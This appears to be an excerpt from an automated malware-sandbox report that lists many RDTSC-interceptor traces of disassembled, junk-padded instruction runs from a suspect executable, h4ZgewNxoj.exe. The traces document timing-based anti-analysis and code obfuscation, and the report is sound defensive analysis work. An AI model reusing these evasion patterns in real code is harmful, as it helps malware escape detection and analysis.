Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B78B33 second address: B78B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B78B3E second address: B78B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B78B42 second address: B78B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B78B4F second address: B78B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B78B55 second address: B78B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AA1E57 second address: AA1E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AA1E5D second address: AA1E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FDFF9160A2Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnc 00007FDFF9160A26h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B87344 second address: B8736D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FDFF8F79156h 0x00000009 jmp 00007FDFF8F79161h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FDFF8F7915Eh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B8736D second address: B87371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B8E6B9 second address: B8E6DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79163h 0x00000007 jmp 00007FDFF8F7915Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B8E3C7 second address: B8E3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B92A9F second address: B92ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FDFF8F7915Dh 0x00000011 jmp 00007FDFF8F79167h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B92ADD second address: B92B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jl 00007FDFF9160A4Eh 0x0000000c push esi 0x0000000d jmp 00007FDFF9160A36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B92C78 second address: B92C86 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FDFF8F79156h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B92C86 second address: B92CA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B92CA8 second address: B92CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B92CAE second address: B92CC5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FDFF9160A31h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BA28B1 second address: BA28BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BA4187 second address: BA418B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC65BD second address: BC65C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC65C6 second address: BC65CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC65CC second address: BC65E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDFF8F79156h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FDFF8F79156h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC65E1 second address: BC6603 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDFF9160A38h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6603 second address: BC6607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6607 second address: BC660B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC68EB second address: BC68EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC68EF second address: BC68F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6A4D second address: BC6A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79165h 0x00000009 jo 00007FDFF8F79156h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6A6E second address: BC6A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6A73 second address: BC6A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDFF8F79156h 0x0000000a ja 00007FDFF8F79156h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6BF2 second address: BC6C09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6C09 second address: BC6C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6EEA second address: BC6F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FDFF9160A35h 0x0000000c jnp 00007FDFF9160A3Ch 0x00000012 popad 0x00000013 js 00007FDFF9160A50h 0x00000019 pushad 0x0000001a je 00007FDFF9160A26h 0x00000020 push edi 0x00000021 pop edi 0x00000022 popad 0x00000023 pushad 0x00000024 jmp 00007FDFF9160A38h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC737F second address: BC7387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC7387 second address: BC73A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDFF9160A26h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FDFF9160A26h 0x00000013 jp 00007FDFF9160A26h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC73A0 second address: BC73A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC74C5 second address: BC74C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC74C9 second address: BC74CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC9008 second address: BC900C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC900C second address: BC9012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC9012 second address: BC901C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FDFF9160A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC901C second address: BC9020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCA63C second address: BCA655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FDFF9160A2Ah 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCBE0F second address: BCBE13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCE750 second address: BCE756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCE756 second address: BCE75C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCE75C second address: BCE760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCE8C4 second address: BCE8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCE8C8 second address: BCE8CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCEC84 second address: BCEC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCEC8A second address: BCEC95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BD05B4 second address: BD05D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FDFF8F79165h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BD05D8 second address: BD05E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BD05E0 second address: BD05F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FDFF8F7915Ch 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA02E4 second address: 4CA030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDFF9160A35h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA030B second address: 4CA031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDFF8F7915Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA031B second address: 4CA032B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA032B second address: 4CA032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA032F second address: 4CA0335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0335 second address: 4CA033B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA033B second address: 4CA033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA033F second address: 4CA0343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0343 second address: 4CA0352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0352 second address: 4CA0356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0356 second address: 4CA035A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA035A second address: 4CA0360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA041D second address: 4CA0421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0421 second address: 4CA043E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA043E second address: 4CA045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA045A second address: 4CA045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA045E second address: 4CA0462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0462 second address: 4CA0468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0468 second address: 4CA04C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDFF9160A30h 0x00000008 push eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FDFF9160A37h 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FDFF9160A32h 0x0000001c adc ecx, 2C39AFC8h 0x00000022 jmp 00007FDFF9160A2Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA04C2 second address: 4CA0515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 pushad 0x00000009 pushad 0x0000000a mov ecx, ebx 0x0000000c pushfd 0x0000000d jmp 00007FDFF8F79163h 0x00000012 xor ah, FFFFFFBEh 0x00000015 jmp 00007FDFF8F79169h 0x0000001a popfd 0x0000001b popad 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDFF8F7915Fh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0515 second address: 4CA051B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA05BF second address: 4CA05E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FDFF8F79164h 0x00000010 mov esi, edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA05E6 second address: 4CA05EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA05EC second address: 4CA0614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edx] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDFF8F7915Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0614 second address: 4CA0623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0623 second address: 4CA06A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007FDFF8F7915Bh 0x0000000b sub esi, 480E9F1Eh 0x00000011 jmp 00007FDFF8F79169h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a inc edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FDFF8F79163h 0x00000024 sbb ax, 892Eh 0x00000029 jmp 00007FDFF8F79169h 0x0000002e popfd 0x0000002f call 00007FDFF8F79160h 0x00000034 pop eax 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA06A0 second address: 4CA06DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FDFF9160A2Ch 0x0000000b jmp 00007FDFF9160A35h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 test al, al 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDFF9160A2Dh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA06DC second address: 4CA0614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDFF8F79167h 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007FDFF8F79059h 0x00000013 mov al, byte ptr [edx] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDFF8F7915Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0707 second address: 4CA070B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA070B second address: 4CA070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA070F second address: 4CA0715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0715 second address: 4CA076B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007FDFF8F79160h 0x0000000b xor eax, 0AD4C0F8h 0x00000011 jmp 00007FDFF8F7915Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub edx, esi 0x0000001c jmp 00007FDFF8F7915Fh 0x00000021 mov edi, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FDFF8F79165h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA076B second address: 4CA0771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0771 second address: 4CA0775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0775 second address: 4CA07A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 dec edi 0x00000009 jmp 00007FDFF9160A2Fh 0x0000000e lea ebx, dword ptr [edi+01h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDFF9160A30h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA07A4 second address: 4CA07AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
